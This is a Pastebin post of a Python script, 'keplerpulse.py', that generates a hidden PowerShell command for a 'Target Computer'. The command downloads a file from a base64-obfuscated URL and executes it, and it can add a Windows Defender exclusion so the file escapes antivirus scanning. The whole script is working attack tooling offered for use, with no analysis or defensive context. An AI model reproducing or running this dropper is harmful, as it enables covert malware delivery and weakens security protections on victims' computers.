Advertisement
FlyFar

keplerpulse.py

Sep 24th, 2023
115
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.72 KB | Cybersecurity | 0 0
  1. #!/usr/bin/python3
  2.  
  3. from colorama import Fore, Style
  4. import colorama
  5. import time
  6. import os, sys
  7. import base64
  8.  
  9. banner = """
  10. ██╗  ██╗███████╗██████╗ ██╗     ███████╗██████╗     ██████╗ ██╗   ██╗██╗     ███████╗███████╗
  11. ██║ ██╔╝██╔════╝██╔══██╗██║     ██╔════╝██╔══██╗    ██╔══██╗██║   ██║██║     ██╔════╝██╔════╝
  12. █████╔╝ █████╗  ██████╔╝██║     █████╗  ██████╔╝    ██████╔╝██║   ██║██║     ███████╗█████╗  
  13. ██╔═██╗ ██╔══╝  ██╔═══╝ ██║     ██╔══╝  ██╔══██╗    ██╔═══╝ ██║   ██║██║     ╚════██║██╔══╝  
  14. ██║  ██╗███████╗██║     ███████╗███████╗██║  ██║    ██║     ╚██████╔╝███████╗███████║███████╗
  15. ╚═╝  ╚═╝╚══════╝╚═╝     ╚══════╝╚══════╝╚═╝  ╚═╝    ╚═╝      ╚═════╝ ╚══════╝╚══════╝╚══════╝
  16.  
  17. """
  18.  
  19.  
  20. def __main__():
  21.  
  22.     colorama.init()
  23.     def help():
  24.         print("keplerpulse _direct_download_link exclude=true/false path=CUSTOM_PATH")
  25.         print("- _direct_download_link - The url to the file that will be downloaded and executed. This link must be direct.")
  26.         print("- exclude=true/false - Add Windows Defender Exclusions. Requires UAC.")
  27.         print("- path=CUSTOM_PATH - Custom Path to save file into.")
  28.         sys.exit()
  29.  
  30.     powershell_ = r"""$a = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('{link}')); (new-object System.Net.WebClient).DownloadFile($a,'{path}'); Start-Process "{path}"
  31.    """
  32.  
  33.     exclude_payload_ = r"""-inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath '{path}';"""
  34.     try:
  35.         download_link = ""
  36.         exclude = ""
  37.         save_path = ""
  38.         exc = False
  39.         try:
  40.             download_link = base64.b64encode(sys.argv[1].encode())
  41.             exclude = sys.argv[2].split("=")[1]
  42.  
  43.             if(exclude == "true"):
  44.                 exc = True
  45.  
  46.         except IndexError:
  47.             help()
  48.        
  49.         try:
  50.             path = sys.argv[3]
  51.             if(len(path) > 0):
  52.                 save_path = path.split("=")[1]
  53.         except IndexError:
  54.             pass
  55.  
  56.  
  57.         # print("The Download Link : ", base64.b64decode(download_link).decode())
  58.         # print("Path : ", save_path)
  59.         # print("Exclude : " , exclude)
  60.        
  61.         print(Style.BRIGHT + Fore.LIGHTRED_EX + banner + Style.RESET_ALL)
  62.         print(Fore.LIGHTCYAN_EX + ">> Run the following command on a Target Computer.\n>> Note that the Windows Defender Exclusion Option will only work if executed in a Elevated Shell."+ Style.RESET_ALL)
  63.         payload = powershell_.replace("{link}", download_link.decode()).replace("{path}", save_path)
  64.         if(exc):
  65.             new = exclude_payload_.replace("{path}", save_path)
  66.             print("powershell.exe -windowstyle hidden " + new + " " + payload)
  67.         else:
  68.             print("powershell.exe -windowstyle hidden ", payload )
  69.     except Exception as e:
  70.         print("Error : ", str(e))
  71.    
  72.  
  73.  
  74. if __name__ == "__main__":
  75.     __main__()
  76.  
Tags: executable
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement